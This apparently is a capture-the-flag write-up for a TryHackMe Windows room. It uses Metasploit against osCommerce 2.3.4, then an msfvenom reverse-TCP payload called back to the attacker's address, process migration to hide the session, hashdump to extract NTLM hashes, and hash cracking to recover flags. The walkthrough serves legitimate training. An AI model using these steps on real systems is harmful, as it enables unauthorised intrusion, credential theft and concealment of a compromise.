Introduction
This CTF from Try Hack Me is a Windows based box where you have to gain your initial foothold then escalate your privilege.
If you want to try this room you can find it here
In the writeup I’ve written, I have shown this being done using Metasploit, this can be done many other ways but I wanted to demonstrate this method.
Brief
The brief just outlines we are looking for the Lab users decrypted NTLM hash and the Root flag.
Recon and Vulnerability
As always, I started out with my Nmap scan.
nmap -sV -Pn -sC -oN <export_directory> <IP>

The result I’m most interested in is the http site on port 8080, going there brings up the below.

Just going to this site gave me the version number of oscommerce, i do know there are vulnerabilities in oscommerce so this will be my area of research!
Exploiting the Vulnerability!
Looking through exploitDB I could see there were vulnerabilities listed for oscommerce, so i decided to search Metasploit.

This had exactly what i was looking for!
If you have searched as i have just type use 0
Then type show options

From this screen you need to do the following
set RHOSTS <Target_IP>
set RPORT <Target_Port> #in our case 8080
set LHOST <Your_IP>
set URI <Path_to_Install> #see my note
On the URI, this is the path to the install directory which is usually under the parent folder then /catalog/install/.
Our parent folder is oscommerce-2.3.4 so our URI is oscommerce-2.3.4/catalog/install/.
Once you have set these type run in Metasploit!
THIS ISN’T STABLE!
When this exploit runs, the meterpreter session is prone to disconnecting, I need to sort this!
In a new console tab, I used the below command to generate a MSFVenom payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP_Address> LPORT=<your port> -f exe > safeshell1.exe
When you set the port, do not use 4444 as this is being used by the other meterpreter session.

Once the payload is generated, I need to get this onto the machine and execute it using the below in my original meterpreter session.
upload safeshell1.exe
execute -f safeshell1.exe
If this doesnt work, make sure the msfvenom payload is in the same directory you started msfconsole from and you may need to re-run your original exploit.

With this running we need another console tab and to start msfconsole again.
In this new msfconsole type use exploit/multi/handler then type show options.
You need to set the following options;
set LHOST <Your_IP>
set LPORT <Port_from_msfvenom>
set Payload windows/meterpreter/reverse_tcp
Then type run

If this didn’t connect straight away, try typing execute -f safeshell1.exe in your original meterpreter session.
BONUS
I wanted to add a little bonus bit in here about migrating, while not required in this CTF, it is good to understand.
At this point, you should consider migrating your meterpreter process into a different process to hide it.
In metasploit you can do this easily by typing
run post/windows/manage/migrate

Lets CTF!
Now we have our stable (and migrated) meterpreter session, lets get the flags!
We know we need to decode the lab users hash, so in meterpeter type in hashdump.

The lab users hash is the last one on the list and the bit we need to copy is everything between the last : which I’ve tried to circle above.
I used crackstation to crack this hash for me!

We have our first flag!
Now time for root, in our meterpreter session, type in shell to give us a windows shell.

I managed to find the flag in the administrators desktop so to get there type in;
cd c:\
cd Users
cd Administrator
cd Desktop
dir
more root.txt.txt

We did it!
This gives us the root flag for the blueprint box!
Conclusion
This is a really good room to practice metasploit skills, i really do recommend that you give the process migration a go!
If you have any questions or want to suggest a room for me to do next let me know!